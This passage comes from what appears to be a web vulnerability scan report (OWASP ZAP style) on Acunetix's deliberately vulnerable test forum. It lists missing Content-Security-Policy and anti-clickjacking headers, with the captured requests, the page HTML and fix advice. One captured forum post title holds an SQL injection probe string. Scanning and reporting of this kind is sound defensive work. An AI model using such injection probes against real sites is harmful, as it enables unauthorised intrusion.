Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=83 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 2779 |
Response Body - size: 2,779 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3131 |
Response Body - size: 3,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
Instances | 456 |
Solution |
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header, to achieve optimal browser support: "Content-Security-Policy" for Chrome 25+, Firefox 23+ and Safari 7+, "X-Content-Security-Policy" for Firefox 4.0+ and Internet Explorer 10+, and "X-WebKit-CSP" for Chrome 14+ and Safari 6+.
|
Reference |
https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html http://www.w3.org/TR/CSP/ http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html http://www.html5rocks.com/en/tutorials/security/content-security-policy/ http://caniuse.com/#feat=contentsecuritypolicy http://content-security-policy.com/ |
Tags |
OWASP_2021_A05
OWASP_2017_A06 |
CWE Id | 693 |
WASC Id | 15 |
Plugin Id | 10038 |
Medium |
Missing Anti-clickjacking Header |
---|---|
Description |
The response does not include either Content-Security-Policy with 'frame-ancestors' directive or X-Frame-Options to protect against 'ClickJacking' attacks.
|
URL | http://testasp.vulnweb.com |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 213 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 214 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=EKIMIJFAFCFMONCJOBLJPEKD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:37 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Default.asp |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 317 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 342 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3198 |
Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 352 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3196 |
Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 522 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:12 GMT Content-Length: 3234 |
Response Body - size: 3,234 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input 